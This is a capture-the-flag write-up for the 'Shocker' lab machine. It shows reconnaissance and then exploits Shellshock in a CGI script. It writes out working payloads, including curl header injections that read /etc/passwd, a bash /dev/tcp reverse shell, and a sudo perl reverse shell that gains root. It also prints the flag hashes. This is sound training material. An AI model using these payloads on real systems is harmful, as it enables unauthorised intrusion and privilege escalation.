Shocker logo

This is an easy linux box

Tools used


  • curl
  • find
  • ffuf
  • nc
  • nmap
  • perl
  • sudo

Reconnaissance


Nmap

nmap -sC -sV -oA shocker 10.10.10.56 -v -Pn

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here’s what nmap teaches us :

  • port 80 (HTTP) - Apache 2.4.18
  • port 2222 (SSH) - OpenSSH 7.2p

Not a lot of ports open. Go check the website :

Webpage

There is nothing here, so let’s search for files/directories. For that I used ffuf https://github.com/ffuf/ffuf.

ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.56/FUZZ -e php,txt,html,/ -t 100

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.56/FUZZ
 :: Wordlist         : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
 :: Extensions       : php txt html / 
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

cgi-bin/                [Status: 403, Size: 294, Words: 22, Lines: 12]
icons/                  [Status: 403, Size: 292, Words: 22, Lines: 12]

Common Gateway Interface (CGI) is an interface specification for web servers to execute programs like console applications running on a server (https://en.wikipedia.org/wiki/Common_Gateway_Interface).

The name of the box is a big hing “Shocker”, knowing that there is a “cgi-bin” folder, there must be a script vulnerable to a shellshock.

When a web server uses the Common Gateway Interface (CGI) to handle a document request, it copies certain information from the request into the environment variable list and then delegates the request to a handler program. If the handler is a Bash script, or if it executes one for example using the system call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted document request (https://en.wikipedia.org/wiki/Shellshock_(software_bug)).

Let’s find out the script, still with fuff. For the extension, I used some common scripts extensions.

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.56/cgi-bin/FUZZ -e .php,.py,.pl,.sh -t 250 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.56/cgi-bin/FUZZ
 :: Wordlist         : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .php .py .pl .sh 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 250
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

user.sh                 [Status: 200, Size: 118, Words: 18, Lines: 8]

There is a script called “user.sh”, when called it returns the uptime of the server.

curl http://10.10.10.56/cgi-bin/user.sh   
Content-Type: text/plain

Just an uptime test script

04:48:11 up 15:15,  0 users,  load average: 0.05, 0.45, 0.39

Exploit


First I tried this one liner that I found here https://github.com/opsxcq/exploit-CVE-2014-6271 :

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.sh

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash

Nice, it is vulnerable to Shellshock ! Now let’s get a reverse shell. First start a nc listener :

nc -lvp 1234

Now execute the exploit, I took the reverse shell from here : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.4/1234 0>&1" http://10.10.10.56/cgi-bin/user.sh

And there we have a reverse shell !

nc -lvp 1234
listening on [any] 1234 ...
10.10.10.56: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.56] 46792
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly

So we’re not root, let’s escalate to root ! First thing that I do when I don’t have “root” privileges is to run the following command :

sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

Bingo ! As we can see the user shelly can run the perl binary with root privileges. So, all I have to do is to found a perl reverse shell and execute it with sudo. First let’s open another nc listener :

nc -lvp 12345

Then execute the reverse shell with root privileges, the perl reverse shell comes from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.

sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.4";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And voila !

nc -lvp 12345
listening on [any] 12345 ...
10.10.10.56: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.56] 60392
/bin/sh: 0: can't access tty; job control turned off
whoami
root

There we have a shell as root ! Go search for the flags now !

Flags


User.txt

shelly@Shocker:/usr/lib/cgi-bin$ find /home -name user.txt
find /home -name user.txt
/home/shelly/user.txt
shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt
cat /home/shelly/user.txt
2ec24e11320026d1e70ff3e16695b233

Root.txt

find / -name root.txt
/root/root.txt
cat /root/root.txt
52c2715605d70c7619030560dc1ca467